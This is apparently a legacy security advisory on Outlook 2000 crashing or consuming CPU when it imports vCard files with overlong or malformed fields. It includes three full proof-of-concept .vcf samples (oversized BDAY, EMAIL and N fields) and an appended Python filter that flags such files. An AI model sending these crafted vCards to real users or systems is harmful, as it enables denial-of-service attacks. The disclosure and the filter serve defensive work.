COMMAND
Outlook
SYSTEMS AFFECTED
Outlook 2000
PROBLEM
Joel Moses found the following. Under certain conditions, excessively
long or malformed fields in a vCard (.vcf) file can cause Outlook
2000 to either overflow or excessively utilize system resources.
The specifications regarding vCard MIME types and field contents
can be found in RFCs 2425 and 2426.
Although RFC 2426 section 2.6 specifically requires lines longer
than 75 characters to be folded as defined in [MIME-DIR], it
appears Outlook does not support line folding, and will attempt
to import any field in the file as one value, even if it is
several pages long or (in one case) overflows a data field within
Outlook.
The effect this unlimited import attempt has on Outlook 2000
varies between field types. Some fields will cause Outlook to
consume nearly all CPU time, and certain others (especially
date/revision fields and e-mail fields) will cause Outlook to
terminate immediately due to an overflow.
Outlook 2000 does not attempt to open and import a .vcf file that
a user receives via e-mail without prompting the user first.
However, vCard files are extremely common, and many users have
trained themselves to ignore the warning dialog box.
Outlook does, however, open a vCard file with no questions asked
if the user saves it to a directory and double-clicks it from
Windows Explorer. In this situation, the vCard is processed
directly with no warning or status messages displayed to the user.
Microsoft Outlook 2000 was the only platform tested (on Windows NT
4.0 Workstation, Service Pack 6a+hotfixes).
Affected fields in vCard file causing an overflow:
- email:
- bday; value=date (as low as 52 characters of form YYYY-MM-D(60))
Affected fields in vCard file causing excessive CPU utilization:
- name:
- nickname:
- fn:
- title:
- title;language=de;value=text:
- tel:
- tel;<label>:
- tel;<label>,<label>:
Fields which do not appear to be affected:
- note:
Fields which do not appear to be supported:
- any fields which continue on the next line or have defined
newlines per RFC-2425
- key:
- o:
No other fields were tested.
The following examples will cause the advertised behavior.
1) A modification of the "bday" field to extend beyond 55
characters. This example appears to be the smallest amount
of text required to elicit the symptom. This example will
cause Outlook 2000 to overflow and terminate.
BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited States of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:196309151308482734927497239479237492739423947927349723947293749274982739472937492873
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD
2) A modification of the "e-mail" field with a large amount of
text data masquerading as an e-mail address. This example
will cause Outlook 2000 to overflow and terminate.
BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited States of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de.sadsack.nothing.doing.is.an.overflo.possible.sadsack.not hing.doing.is.an.overflow.possible.
<content clipped for brevity - envision lots of text here>
.sadsack.nothing.doing.is.an.overflow.possible.com
REV:20000830T191121Z
END:VCARD
3) A modification of the "N" or "name" field with a large amount
of text will not cause Outlook to terminate, but will increase
Outlook's CPU utilization to 99%.
BEGIN:VCARD
VERSION:2.1
N:Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger Meister
<content clipped for brevity - envision lots of text here>
Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited States of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD
SOLUTION
None at present, other than to disassociate the .vcf extension
from Outlook. There may be more fields affected -- these are
merely the initially tested ones.
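
A pre-import check for the conditions this advisory describes (physical lines over the 75-character folding limit, oversized EMAIL and BDAY/REV values), suitable for a mail filter that screens .vcf attachments. This is an added example, not part of the original advisory; the length caps, the simplified date pattern and all function names are assumptions.

```python
import re

MAX_PHYSICAL_LINE = 75   # folding limit from RFC 2426 section 2.6
# Assumed caps on the unfolded value; tune to what your mail client tolerates.
MAX_VALUE_LEN = {"EMAIL": 254, "BDAY": 20, "REV": 20}
DEFAULT_MAX_VALUE_LEN = 1024
# Simplified ISO 8601 date / UTC date-time (no zone offsets): an assumption.
DATE_RE = re.compile(r"\d{4}-?\d{2}-?\d{2}(T\d{2}:?\d{2}:?\d{2}Z?)?")

def unfold(text):
    """Join folded lines: a line break followed by one space or tab."""
    return re.sub(r"\r?\n[ \t]", "", text)

def field_name(line):
    """Upper-cased property name, without parameters such as ;PREF."""
    return re.split(r"[;:]", line, maxsplit=1)[0].strip().upper()

def audit_vcard(text):
    """Return (field, reason) findings for one vCard; empty list means clean."""
    findings = []
    for raw in text.splitlines():
        if len(raw) > MAX_PHYSICAL_LINE:
            name = "(continuation)" if raw[:1] in " \t" else field_name(raw)
            findings.append((name, "physical line exceeds 75 characters"))
    for line in unfold(text).splitlines():
        if ":" not in line:
            continue
        name, value = field_name(line), line.split(":", 1)[1]
        limit = MAX_VALUE_LEN.get(name, DEFAULT_MAX_VALUE_LEN)
        if len(value) > limit:
            findings.append((name, f"value is {len(value)} chars, cap {limit}"))
        if name in ("BDAY", "REV") and not DATE_RE.fullmatch(value.strip()):
            findings.append((name, "not an ISO 8601 date"))
    return findings

# Constructed samples, not taken from a real message.
CLEAN = ("BEGIN:VCARD\r\nVERSION:2.1\r\nFN:Test User\r\nBDAY:19630915\r\n"
         "EMAIL;PREF;INTERNET:user@example.test\r\nREV:20000830T191121Z\r\n"
         "END:VCARD\r\n")
LONG_BDAY = CLEAN.replace("19630915", "1963091513" + "0" * 70)
# Correctly folded, so only the cap on the unfolded value catches it.
FOLDED_EMAIL = CLEAN.replace("user@", "\r\n ".join(["a" * 50] * 6) + "@")

if __name__ == "__main__":
    for label, card in [("clean", CLEAN), ("long bday", LONG_BDAY),
                        ("folded email", FOLDED_EMAIL)]:
        print(label, audit_vcard(card))
```

A file with any finding can be quarantined or stripped before it reaches the client.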